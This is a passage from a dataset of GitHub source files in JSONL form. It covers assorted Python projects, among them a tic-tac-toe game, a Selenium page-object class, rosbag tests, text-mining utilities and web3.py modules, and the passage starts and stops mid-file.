erp.GiscedataPolissa.read(range(100),[])\nsuccess(\"Llegir {} Contractes {}\",nregistres, time.time()-t0)\n\nt0 = time.time()\naccountML = erp.AccountMoveLine.read(range(50),[])\nsuccess(\"Llegir {} Account Move Line {}\",nregistres, time.time()-t0)\n\n\n\n#vim: ts=4 sw=4 noet\n","repo_name":"Som-Energia/somenergia-scripts","sub_path":"benchmarks/user_browse.py","file_name":"user_browse.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30892770573","text":"from pathlib import Path\n\n\nclass Config:\n def __init__(self):\n self.weights_path = './data/final.h5'\n self.train_path = './data/garden_stuff/train'\n self.test_path = './data/garden_stuff/test'\n self.seed = 228\n self.epochs = 300\n self.img_width = 64\n self.img_height = 64\n self.batch_size = 32\n self.samples_per_epoch = 512\n self.validation_steps = 512 / self.batch_size\n self.filters1 = 128\n self.filters2 = 256\n self.filters3 = 512\n self.filters4 = 256\n self.dense_size1 = 384\n self.dense_size2 = 256\n self.dense_size3 = 128\n self.conv_size1 = 4\n self.conv_size2 = 6\n self.conv_size3 = 8\n self.conv_size4 = 4\n self.pool_size = 2\n self.alternative_pool_size = 2\n self.classes_num = 74\n self.lr = 0.001\n self.lr_decay = 0.01\n self.leaky_rely_alpha = 0.001\n self.prediction_steps = 12000\n self.dropout_rate = 0.0\n","repo_name":"d768/ClassyBanana","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18949813423","text":"import json\nimport os\nfrom util.XMLParser import extract_word_from_xml\nimport jieba\nfrom classification.Preprocessor import Preprocessor\n\n\ndef doc_word_seg():\n \"\"\"\n load docs, and then do word segmentation.\n :return: list of tuple, (id, segment_word_list)\n \"\"\"\n ws_ms_category_file_path = \"../data/ws_ms_category.json\"\n doc_word_seg_file_path = \"../data/doc_word_seg.json\"\n word_segment_file_root = \"../data/output\"\n\n if os.path.exists(doc_word_seg_file_path):\n print(\"Pre segmented files found, loading...\")\n doc_word_list_ = json.load(open(doc_word_seg_file_path, \"r\"))\n print(\"Loading finished!\")\n else:\n print(\"Extracting basic info from files...\")\n sample_list = json.load(open(ws_ms_category_file_path, \"r\"))\n\n print(\"Segmenting words...\")\n doc_word_list_ = []\n for sample in sample_list:\n content = load_word_segment(\"%s/%s.xml\" % (word_segment_file_root, sample[\"ID\"]))\n word_segment = extract_word_from_xml(content)\n\n if len(word_segment) == 0:\n word_segment = []\n seg_list = jieba.cut(sample[\"BASIC_INFO\"])\n for seg in seg_list:\n word_segment.append(seg)\n\n doc_word_list_.append((sample[\"ID\"], word_segment))\n\n json.dump(doc_word_list_, open(doc_word_seg_file_path, \"w\"))\n print(\"Loading finished!\")\n return doc_word_list_\n\n\ndef load_word_segment(file_path):\n if os.path.exists(file_path):\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\n content = file.read()\n file.close()\n return content\n return \"\"\n\n\ndef duplicate_words_removal(doc_word_list_):\n print(\"Starting duplicate words removal...\")\n unique_doc_word_seg_file_path = \"../data/unique_doc_word_seg.json\"\n if os.path.exists(unique_doc_word_seg_file_path):\n unique_doc_word_list_ = json.load(open(unique_doc_word_seg_file_path, \"r\"))\n else:\n unique_doc_word_list_ = []\n for _id, word_list_ in doc_word_list_:\n unique_word_list = get_word_set(word_list_)\n unique_doc_word_list_.append((_id, unique_word_list))\n json.dump(unique_doc_word_list_, open(unique_doc_word_seg_file_path, \"w\"))\n\n print(\"Duplicate words removal finished!\")\n return unique_doc_word_list_\n\n\ndef symbols_removal(doc_word_list_):\n \"\"\"\n remove symbols and numeric strings in doc_word_list\n :param doc_word_list_:\n :return:\n \"\"\"\n doc_word_seg_symbols_removal_file_path = \"../data/doc_word_seg_symbols_removal.json\"\n print(\"Removing symbols and numeric strings from files...\")\n if os.path.exists(doc_word_seg_symbols_removal_file_path):\n new_doc_word_list_ = json.load(open(doc_word_seg_symbols_removal_file_path))\n else:\n stopwords_symbols_file_path = \"../stopwords_symbols.txt\"\n symbols = [line.decode(\"utf-8\").strip() for line in open(stopwords_symbols_file_path, \"rb\").readlines()]\n\n new_doc_word_list_ = []\n for _id, word_list_ in doc_word_list_:\n new_word_list_ = []\n for word_ in word_list_:\n if word_ not in symbols and not str(word_).isnumeric():\n new_word_list_.append(word_)\n new_doc_word_list_.append((_id, new_word_list_))\n\n json.dump(new_doc_word_list_, open(doc_word_seg_symbols_removal_file_path, \"w\"))\n print(\"Symbols removal finished!\")\n return new_doc_word_list_\n\n\ndef calc_df(doc_word_list_):\n print(\"Calculating document frequency...\")\n\n df_file_path = \"../data/document_frequency.json\"\n if os.path.exists(df_file_path):\n word_frequency_sorted_ = json.load(open(df_file_path))\n else:\n # TODO trunk doc_word_list\n # TODO invoke multi-thread to handle each trunk\n # TODO Join result\n word_frequency_ = calc_trunk_df(doc_word_list_, 1)\n\n word_frequency_sorted_ = sort_frequency(word_frequency_)\n json.dump(word_frequency_sorted_, open(df_file_path, \"w\"))\n print(\"Calculation finished!\")\n return word_frequency_sorted_\n\n\ndef sort_frequency(word_frequency_):\n print(\"Sorting frequency...\")\n frequency_sorted_ = sorted(word_frequency_, key=lambda key: key[1], reverse=True)\n print(\"Sorting frequency finished!\")\n return frequency_sorted_\n\n\ndef calc_trunk_df(doc_word_list_trunk, trunk_index):\n print(\"Calculating document frequency of trunk %s\" % trunk_index)\n\n trunk_temp_file_path = \"../data/trunk/%s.json\" % trunk_index\n\n word_frequency_ = {}\n for _, word_list_ in doc_word_list_trunk:\n for word in word_list_:\n if word in word_frequency_.keys():\n word_frequency_[word] += 1\n else:\n word_frequency_[word] = 1\n\n word_frequency_list = list(word_frequency_.items())\n json.dump(word_frequency_list, open(trunk_temp_file_path, \"w\"))\n print(\"Calculating document frequency of trunk %s finished\" % trunk_index)\n return word_frequency_list\n\n\ndef get_word_set(word_list):\n word_set = []\n for word in word_list:\n word = str(word).lstrip()\n if word not in word_set and len(word) > 0:\n word_set.append(word)\n return word_set\n\n\ndef filter_stopwords():\n preprocessor = Preprocessor()\n new_lines = []\n with open(\"../words_frequency.txt\", \"r\", encoding=\"utf-8\") as file:\n lines = file.readlines()\n for line in lines:\n str_list = line.split(\",\")\n word = str_list[0]\n count = str_list[1]\n\n word = preprocessor.process_word(word)\n if len(word) > 1:\n new_lines.append((word, count))\n file.close()\n with open(\"../words_frequency2.txt\", \"w\", encoding=\"utf-8\") as file:\n for line in new_lines:\n file.write(\"%s,%s\" % (line[0], line[1]))\n file.close()\n\n\nif __name__ == \"__main__\":\n # doc_word_list = doc_word_seg()\n # doc_word_list = symbols_removal(doc_word_list)\n # doc_word_list = duplicate_words_removal(doc_word_list)\n # word_frequency = calc_df(doc_word_list)\n #\n # with open(\"../words_frequency.txt\", \"w\", encoding=\"utf-8\") as file:\n # for wf in word_frequency:\n # file.write(\"%s,%s\" % (wf[0], wf[1]))\n # file.write(\"\\n\")\n # file.close()\n\n filter_stopwords()\n","repo_name":"leimiaomiao/TextMining","sub_path":"MachineLearning/stopwords/StopwordsGenerator.py","file_name":"StopwordsGenerator.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71454861869","text":"from kivymd.uix.dialog import ListMDDialog\n\n\"\"\"\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\npopup = Popup(title='Test popup', content=Label(text='Hello world'), size_hint=(None, None), size=(400, 400))\n\"\"\"\n\nclass LocationPopupMenu(ListMDDialog):\n\n def __init__(self, location_data):\n super().__init__()\n # Info from csv file\n headers= \"Lieu;X;Y;Description;Payant\"\n headers= headers.split(';')\n print(location_data)\n for i in range(len(headers)):\n attribute_name = headers[i]\n attribute_value = location_data[i]\n setattr(self, attribute_name, attribute_value)\n","repo_name":"thibaultmey/Project_10","sub_path":"Program/locationpopupmenu.py","file_name":"locationpopupmenu.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42683589272","text":"import random\nnumeri=[0]*20\nfor i in range(0,20):\n numeri[i]=random.randint(1,10)\nprint(numeri)\npari=0\ndispari=0\nfor i in range(0,len(numeri)):\n if numeri[i]%2==0:\n pari+=numeri[i]\n else:\n dispari+=numeri[i]\nprint(\"somma pari:\",pari)\nprint(\"somma dispari:\",dispari)\n ","repo_name":"MarcoInc/Python_Exercises","sub_path":"Esercizi/Sommatoria pari e dispari array.py","file_name":"Sommatoria pari e dispari array.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38923606864","text":"import pandas as pd\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# Citirea datelor de antrenare și test\r\ntrain_data = pd.read_csv('train.csv')\r\ntest_data = pd.read_csv('test.csv')\r\n\r\n# Separarea caracteristicilor și a variabilei țintă din datele de antrenare\r\ntrain_x = train_data.drop(columns=['Id', 'Open Date', 'City', 'City Group', 'Type', 'revenue'])\r\ntrain_y = train_data['revenue']\r\n\r\n# Inițializarea și antrenarea modelului de regresie liniară\r\nregressor = LinearRegression()\r\nregressor.fit(train_x, train_y)\r\n\r\n# Realizarea predicțiilor pe datele de test\r\ntest_x = test_data.drop(columns=['Id', 'Open Date', 'City', 'City Group', 'Type'])\r\npredictions = regressor.predict(test_x)\r\n\r\n# Calcularea erorii medii pătratice (MSE) pe datele de antrenare\r\ntrain_predictions = regressor.predict(train_x)\r\ntrain_mse = mean_squared_error(train_y, train_predictions)\r\nprint(\"Mean Squared Error (Train):\", train_mse)\r\n\r\n# Salvarea rezultatelor în fișierul 'sampleSubmission.csv'\r\nsubmission = pd.DataFrame({'Id': test_data['Id'], 'Prediction': predictions})\r\nsubmission.to_csv('sampleSubmission2.csv', index=False)\r\n","repo_name":"Daiana200/proiectlp3","sub_path":"ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72429404586","text":"#!/usr/bin/python3\n\nimport argparse\nfrom pathlib import Path\nimport re\n\n\nclass Get_iperf_sum:\n\n def __init__(self, file_path) -> None:\n self.file = Path(file_path)\n\n def get_sum(self):\n # print(self.file)\n with open(self.file) as f:\n lines = f.readlines()\n # print(lines)\n\n sums = (line for line in lines if line[0:5] == '[SUM]')\n # print(list(sums))\n\n # [SUM] 0.00-1.00 sec 76.3 MBytes 640 Mbits/sec 0.090 ms 1786/58153 (3.1%)\n mbps_pattern = re.compile(r'(\\d*.?\\d*) Mbits/sec')\n\n counter = 0\n total = 0.0\n for each in sums:\n try:\n mbps = float(mbps_pattern.search(each).group(1))\n counter += 1\n total += mbps\n print(f'{counter}: {mbps} Mbps')\n except Exception as e:\n pass\n\n print(f'\\nTotal count: {counter}, AVG: {total/counter:.2f} Mbps\\n')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--file_path', required=True,\n type=str, help='iperf txt file to calculate sum.')\n args = parser.parse_args()\n\n worker = Get_iperf_sum(args.file_path)\n\n worker.get_sum()\n","repo_name":"balao1312/mydropbox","sub_path":"get_iperf_sum.py","file_name":"get_iperf_sum.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23661125214","text":"\"\"\"bj_1932\n\nhttps://www.acmicpc.net/problem/1932\n\"\"\"\ndef get_summary(datas):\n summary = [datas.pop(0)]\n for idx1, data in enumerate(datas):\n tmp = []\n for idx2, d in enumerate(data):\n _max = max([summary[idx1][max([0, idx2-1])],\n summary[idx1][min([idx1, idx2])]])\n tmp.append(_max + d)\n summary.append(tmp)\n return summary[-1]\n\nif __name__ == '__main__':\n HEIGHT = int(input())\n TRIANGLE = list()\n for step in range(HEIGHT):\n _input = input().split(\" \")\n TRIANGLE.append(list(map(int, _input)))\n print(max(get_summary(TRIANGLE)))\n","repo_name":"LazyerIJ/Algorithm","sub_path":"Problem/BakJoon/bj_1932.py","file_name":"bj_1932.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30454120347","text":"import pygame\nimport sys\nimport math\n\n\nfrom tictactoe_client import TicTacToeClient\nfrom tictactoe_ai import TicTacToeAI\n\n\nSCREEN_SIZE = SCREEN_WIDTH, SCREEN_HEIGHT = 600, 600\nCELL_SIZE = CELL_WIDTH, CELL_HEIGHT = int(SCREEN_WIDTH/3), int(SCREEN_HEIGHT/3)\nMARK_SIZE = MARK_WIDTH, MARK_HEIGHT = int(CELL_WIDTH*0.8), int(CELL_HEIGHT*0.8)\nIN_CELL_OFFSET = IN_CELL_OFFSET_WIDTH, IN_CELL_OFFSET_HEIGHT = int((CELL_WIDTH-MARK_WIDTH)/2), int((CELL_HEIGHT-MARK_HEIGHT)/2)\nWHITE = (255, 255, 255)\nBLUE = (0, 0, 255)\nRED = (255, 0, 0)\n\n\ndef _translate_to_screen_coords(coords):\n return coords[0] * CELL_WIDTH + IN_CELL_OFFSET_WIDTH, coords[1] * CELL_HEIGHT + IN_CELL_OFFSET_HEIGHT\n\n\nif __name__ == '__main__':\n # Set up display\n pygame.display.init()\n screen = pygame.display.set_mode(SCREEN_SIZE)\n\n mark_x = pygame.Surface(MARK_SIZE)\n pygame.draw.line(mark_x, BLUE, (0, 0), (MARK_WIDTH, MARK_HEIGHT), 10)\n pygame.draw.line(mark_x, BLUE, (0, MARK_HEIGHT), (MARK_WIDTH, 0), 10)\n\n mark_o = pygame.Surface(MARK_SIZE)\n pygame.draw.circle(mark_o, RED, (int(MARK_WIDTH/2), int(MARK_HEIGHT/2)), MARK_WIDTH/2, 10)\n\n player_mark = {\n 1: mark_x,\n 2: mark_o\n }\n\n # Set up board\n pygame.draw.line(screen, WHITE, (int(SCREEN_WIDTH/3), 0), (int(SCREEN_WIDTH/3), SCREEN_HEIGHT))\n pygame.draw.line(screen, WHITE, (int(SCREEN_WIDTH/3)*2, 0), (int(SCREEN_WIDTH/3)*2, SCREEN_HEIGHT))\n pygame.draw.line(screen, WHITE, (0, int(SCREEN_HEIGHT/3)), (SCREEN_WIDTH, int(SCREEN_HEIGHT/3)))\n pygame.draw.line(screen, WHITE, (0, int(SCREEN_HEIGHT/3)*2), (SCREEN_WIDTH, int(SCREEN_HEIGHT/3)*2))\n \n # Draw screen\n pygame.display.flip()\n\n is_ai_turn = False\n is_ended = False\n\n # Initialize backend\n game_client = TicTacToeClient(first_player=1)\n game_ai = TicTacToeAI(ai_id=2, game_object=game_client)\n\n\n # Main game loop\n while True:\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.constants.QUIT:\n sys.exit()\n elif event.type == pygame.constants.MOUSEBUTTONUP:\n if not is_ai_turn and not is_ended:\n cursor_position = pygame.mouse.get_pos()\n coords = math.floor(cursor_position[0]/CELL_SIZE[0]), math.floor(cursor_position[1]/CELL_SIZE[1])\n player_coord = game_client.move(player_id=1, coord=coords)\n draw_coords = _translate_to_screen_coords(player_coord)\n screen.blit(player_mark[1], draw_coords)\n is_ai_turn = True\n is_ended = game_client.is_ended()\n\n if is_ai_turn and not is_ended:\n ai_coord = game_ai.move()\n draw_coords = _translate_to_screen_coords(ai_coord)\n screen.blit(player_mark[2], draw_coords)\n is_ai_turn=False\n is_ended = game_client.is_ended()\n \n pygame.display.flip()\n","repo_name":"Zsombroo/tic-tac-toe-with-ai","sub_path":"TicTacToePython/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26238769294","text":"from selenium.webdriver.support import expected_conditions as EC\nimport math\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.common.exceptions import NoAlertPresentException # в начале файла\nfrom selenium.webdriver import Remote as RemoteWebDriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom .locators import BasePageLocators\n\n\nclass BasePage():\n def __init__(self, browser: RemoteWebDriver, url, timeout=10):\n self.browser = browser\n self.url: str = url\n self.browser.implicitly_wait(timeout)\n\n def open(self):\n self.browser.get(self.url)\n\n def is_element_present(self, how, what) -> bool:\n \"\"\"\n Проверка на наличие элемента на странице\n\n :param how: как искать при помощи классов BY\n :param what: str что искать\n :return: bool\n \"\"\"\n try:\n self.browser.find_element(how, what)\n except NoSuchElementException:\n return False\n return True\n\n def solve_quiz_and_get_code(self):\n alert = self.browser.switch_to.alert\n x = alert.text.split(\" \")[2]\n answer = str(math.log(abs((12 * math.sin(float(x))))))\n alert.send_keys(answer)\n alert.accept()\n try:\n alert = self.browser.switch_to.alert\n alert_text = alert.text\n print(f\"Your code: {alert_text}\")\n alert.accept()\n except NoAlertPresentException:\n print(\"No second alert presented\")\n\n def is_not_element_present(self, how, what, timeout=4):\n \"\"\"\n is_not_element_present: упадет, как только увидит искомый элемент.\n Не появился: успех, тест зеленый.\n https://stepik.org/lesson/201964/step/5?unit=176022\n абстрактный метод, который проверяет, что элемент не появляется на странице в течение заданного времени\n\n Пример использования\n\n def should_not_be_success_message(self):\n assert self.is_not_element_present(*ProductPageLocators.SUCCESS_MESSAGE), \\\n \"Success message is presented, but should not be\"\n\n :param self:\n :param how:\n :param what:\n :param timeout:\n :return:\n \"\"\"\n try:\n WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return True\n\n return False\n\n def is_disappeared(self, how, what, timeout=4):\n \"\"\"\n is_disappeared: будет ждать до тех пор, пока элемент не исчезнет.\n https://stepik.org/lesson/201964/step/5?unit=176022\n Если же мы хотим проверить, что какой-то элемент исчезает, то следует воспользоваться\n явным ожиданием вместе с функцией until_not, в зависимости от того, какой результат мы ожидаем\n\n :param self:\n :param how:\n :param what:\n :param timeout:\n :return:\n \"\"\"\n try:\n WebDriverWait(self.browser, timeout, 1, TimeoutException). \\\n until_not(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n return True\n\n def go_to_login_page(self):\n \"\"\"\n Переход на страницу с логином\n :return:\n \"\"\"\n link = self.browser.find_element(*BasePageLocators.LOGIN_LINK)\n link.click()\n\n def should_be_login_link(self):\n \"\"\"\n Проверям есть ли элемент Логин на странице\n :return:\n \"\"\"\n assert self.is_element_present(*BasePageLocators.LOGIN_LINK), \"Login link is not presented\"\n\n def open_basket(self):\n \"\"\"\n Переходит в корзину по кнопке в шапке\n :return:\n \"\"\"\n link = self.browser.find_element(*BasePageLocators.BASKET_LINK)\n link.click()","repo_name":"ivanovnickolay/stepik_python","sub_path":"Python_selenium/Lesson_4/pages/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12341258301","text":"import unittest\nimport tempfile\nimport os\n\nimport rosbag\nimport rospy\n\nBAG_DIR = tempfile.mkdtemp(prefix='rosbag_tests')\n\nclass TestRoundTrip(unittest.TestCase):\n def _write_simple_bag(self, name):\n from std_msgs.msg import Int32, String\n\n with rosbag.Bag(name, 'w') as bag:\n s = String(data='foo')\n i = Int32(data=42)\n\n bag.write('chatter', s)\n bag.write('numbers', i)\n\n def _fname(self, name):\n return os.path.join(BAG_DIR, name)\n\n def test_value_equality(self):\n fname = self._fname('test_value_equality.bag')\n\n self._write_simple_bag(fname)\n\n with rosbag.Bag(fname) as bag:\n numbers = list(bag.read_messages('numbers'))\n chatter = list(bag.read_messages('chatter'))\n\n self.assertEqual(len(numbers), 1)\n self.assertEqual(len(chatter), 1)\n\n numbers = numbers[0]\n chatter = chatter[0]\n\n # channel names\n self.assertEqual(numbers[0], 'numbers')\n self.assertEqual(chatter[0], 'chatter')\n\n # values\n self.assertEqual(numbers[1].data, 42)\n self.assertEqual(chatter[1].data, 'foo')\n\n @unittest.expectedFailure\n def test_type_equality(self):\n fname = self._fname('test_type_equality.bag')\n\n from std_msgs.msg import Int32, String\n\n self._write_simple_bag(fname)\n\n with rosbag.Bag(fname) as bag:\n numbers = next(bag.read_messages('numbers'))\n chatter = next(bag.read_messages('chatter'))\n\n self.assertEqual(numbers[1].__class__, Int32)\n self.assertEqual(chatter[1].__class__, String)\n\n @unittest.expectedFailure\n def test_type_isinstance(self):\n fname = self._fname('test_type_isinstance.bag')\n\n from std_msgs.msg import Int32, String\n\n self._write_simple_bag(fname)\n\n with rosbag.Bag(fname) as bag:\n numbers = next(bag.read_messages('numbers'))\n chatter = next(bag.read_messages('chatter'))\n\n self.assertIsInstance(numbers[1], Int32)\n self.assertIsInstance(chatter[1], String)\n","repo_name":"ros/ros_comm","sub_path":"tools/rosbag/test/test_roundtrip.py","file_name":"test_roundtrip.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":712,"dataset":"github-code","pt":"37"} +{"seq_id":"36668060699","text":"from eth_account import Account # noqa: E402,\nimport pkg_resources\n\nfrom web3.main import (\n AsyncWeb3,\n Web3,\n)\nfrom web3.providers.async_rpc import ( # noqa: E402\n AsyncHTTPProvider,\n)\nfrom web3.providers.eth_tester import ( # noqa: E402\n EthereumTesterProvider,\n)\nfrom web3.providers.ipc import ( # noqa: E402\n IPCProvider,\n)\nfrom web3.providers.rpc import ( # noqa: E402\n HTTPProvider,\n)\nfrom web3.providers.websocket import ( # noqa: E402\n WebsocketProvider,\n WebsocketProviderV2,\n)\n\n__version__ = pkg_resources.get_distribution(\"web3\").version\n\n__all__ = [\n \"__version__\",\n \"AsyncWeb3\",\n \"Web3\",\n \"HTTPProvider\",\n \"IPCProvider\",\n \"WebsocketProvider\",\n \"WebsocketProviderV2\",\n \"EthereumTesterProvider\",\n \"Account\",\n \"AsyncHTTPProvider\",\n]\n","repo_name":"ethereum/web3.py","sub_path":"web3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":4510,"dataset":"github-code","pt":"37"} +{"seq_id":"40435279355","text":"# use google images api to download map images\n# importing google_images_download module \nfrom google_images_download import google_images_download \ndef downloadimages(query): \n arguments = {\"keywords\": query, \"format\": \"png\", \"limit\":100, \n \"print_urls\":True, \"size\": \"medium\",\n \"chromedriver\":\"C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\chromedriver\\\\chromedriver.exe\"} \n try: \n response.download(arguments) \n \n # Handling File NotFound Error \n except FileNotFoundError: \n arguments = {\"keywords\": query, \n \"format\": \"jpg\", \n \"limit\":100, \n \"print_urls\":True, \n \"size\": \"medium\",\n \"chromedriver\":\"C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\chromedriver\\\\chromedriver.exe\"} \n \n # Providing arguments for the searched query \n try: \n # Downloading the photos based \n # on the given arguments \n response.download(arguments) \n except: \n pass\n \n# creating object \nresponse = google_images_download.googleimagesdownload() \n \nsearch_queries = ['world map']\n \n# Driver Code 0\nfor query in search_queries: \n downloadimages(query) \n print() \n\n","repo_name":"JialinLiOSU/classifyThematicMaps","sub_path":"downloadImages/imageDownload.py","file_name":"imageDownload.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8072142220","text":"from input_module import take_input\nfrom music import *\nfrom timeANDdate_module import get_time, get_date, get_day\nfrom database import *\nfrom output_module import output\nfrom internet import check_internet_connection, check_on_wikipedia\nimport assistance_details\nfrom web import close_browser, open_facebook, open_google\n\n\ndef process(query):\n\n if \"play\" in query and \"music\" not in query:\n answer = get_answer_from_memory(\"play specific\")\n\n elif \"set volume\" in query:\n answer = get_answer_from_memory(\"set volume\")\n else:\n answer = get_answer_from_memory(query)\n\n # ----------------------------------------------------------\n\n # change name\n if answer == \"change name\":\n output(\"Okay! what do you want to call me?\")\n temp = take_input()\n if temp == assistance_details.name:\n return \"can't change. I think you're happy with my old name\"\n else:\n update_name(temp)\n assistance_details.name = temp\n return \"Now you can call me \" + temp\n\n # -----------------------------------------------------------\n\n # speech mode on\n elif answer == \"speech mode on\":\n speech_on()\n\n # speech mode off\n elif answer == \"speech mode off\":\n speech_off()\n\n # --------------------------------------------------------------\n\n # PA name\n elif answer == \"your name\":\n return (\"I am \"+assistance_details.name)\n\n # ------------------------------------------------------------\n\n # Current Time Details\n elif answer == \"get time details\":\n return (\"Time is \" + get_time())\n\n\n # Today's Day details\n elif answer == \"week day details\":\n return (\"Today is \" + get_day())\n\n # Today's Date details\n elif answer == \"todays date details\":\n return (str(get_date()))\n\n # ------------------------------------------------------------\n\n # open facebook\n elif answer == \"open facebook\":\n open_facebook()\n return \"opening facebook\"\n\n # open google/browser\n elif answer == \"open google\":\n open_google()\n return \"opening google\"\n\n # close google/browser\n elif answer == \"close browser\":\n close_browser()\n return \"your current browser is closed\"\n \n # check internet connection\n elif answer == \"check internet connection\":\n if check_internet_connection():\n return \"Internet is Connected\"\n\n else:\n return \"Internet is NOT Connected\"\n\n # ------------------------------------------------------------\n\n # play song\n elif answer == \"play music\":\n play_music()\n return \"playing music\"\n\n # pause/stop music\n elif answer == \"pause music\" or answer == \"stop music\":\n pause_music()\n return \"paused\"\n\n # volume up music\n elif answer == \"volume up\":\n volume_up()\n return \"increased\"\n \n # volume down music\n elif answer == \"volume down\":\n volume_down()\n return \"decreased\"\n\n # next song\n elif answer == \"next song\":\n next_song()\n return \"playing next\"\n\n # previous song\n elif answer == \"previous song\":\n previous_song()\n return \"playing previous\"\n\n elif answer == \"play specific\":\n return play_specific_song(query)\n\n elif answer == \"set volume\":\n return set_volume(query)\n\n\n # ------------------------------------------------------------\n\n # teach PA and search on wikipedia\n else:\n\n # search on wikipedia\n output(\"Don't know this one should I search on web\")\n ans = take_input()\n if \"yes\" in ans:\n \n answer = check_on_wikipedia(query)\n if answer != \"\":\n output(\"Here is what I found on Web\")\n return answer\n else:\n\n # teach PA\n output(\"can you please tell me what it means?\")\n ans = take_input()\n if \"it means\" in ans:\n ans = ans.replace(\"it means\", \"\")\n ans = ans.strip()\n\n value = get_answer_from_memory(ans)\n if value == \"\":\n return \"can't help with this one\"\n\n else:\n insert_question_and_answer(query, value)\n return \"Thanks I will remember it for the next time\"\n else:\n return \"can't help with this one\"\n\n","repo_name":"kamitssm123/Narad-Desktop-Assistance","sub_path":"process_module.py","file_name":"process_module.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4415980298","text":"#Irvin Vásquez Figueroa\r\n#A01541101\r\n#Objetivo: pedir apellidos e imprimir datos de estos.\r\napellido_paterno = (input(\"¿Cuál es tu apellido paterno?\"))\r\napellido_materno = (input(\"¿Y el materno?\"))\r\n#Se piden los apellidos al usuario.\r\n\r\nprint(\"Tu apellido paterno tiene \",len(apellido_paterno) , \"letras\")\r\n#Se imprime la longitud del apellido paterno. Es decir, cuántas letras tiene.\r\n\r\nx = 0\r\nfor letras in apellido_materno:\r\n #Se hace un ciclo for que va recorriendo cada letra del apellido materno\r\n if letras.lower() in \"a e i o u\":\r\n #Se hace un if, en donde primero se convierten las letras del apellido en minúscula\r\n #Después, si la letra en la que se va recorriendo es alguna vocal, se le suma 1 al contador.\r\n x = x+1\r\nprint (\"Tu apellido materno tiene \" , x, \" vocales\")\r\n#Se imprime el número de vocales que tiene\r\n\r\nprint(apellido_paterno,\"$$$\",apellido_materno)\r\n#Se imprimen ambos apellidos con el símbolo de dinero en medio.\r\n","repo_name":"IrvinVF/Actividad11_clase","sub_path":"actividad11.py","file_name":"actividad11.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36668407709","text":"from typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n)\n\nfrom eth_utils import (\n is_dict,\n)\nfrom eth_utils.curried import (\n apply_formatter_if,\n apply_formatters_to_dict,\n apply_key_map,\n is_null,\n)\nfrom eth_utils.toolz import (\n complement,\n compose,\n)\nfrom hexbytes import (\n HexBytes,\n)\n\nfrom web3._utils.rpc_abi import (\n RPC,\n)\nfrom web3.middleware.formatting import (\n async_construct_formatting_middleware,\n construct_formatting_middleware,\n)\nfrom web3.types import (\n AsyncMiddlewareCoroutine,\n RPCEndpoint,\n)\n\nif TYPE_CHECKING:\n from web3 import ( # noqa: F401\n AsyncWeb3,\n Web3,\n )\n\nis_not_null = complement(is_null)\n\nremap_geth_poa_fields = apply_key_map(\n {\n \"extraData\": \"proofOfAuthorityData\",\n }\n)\n\npythonic_geth_poa = apply_formatters_to_dict(\n {\n \"proofOfAuthorityData\": HexBytes,\n }\n)\n\ngeth_poa_cleanup = compose(pythonic_geth_poa, remap_geth_poa_fields)\n\n\ngeth_poa_middleware = construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, geth_poa_cleanup),\n },\n)\n\n\nasync def async_geth_poa_middleware(\n make_request: Callable[[RPCEndpoint, Any], Any], w3: \"AsyncWeb3\"\n) -> AsyncMiddlewareCoroutine:\n middleware = await async_construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, 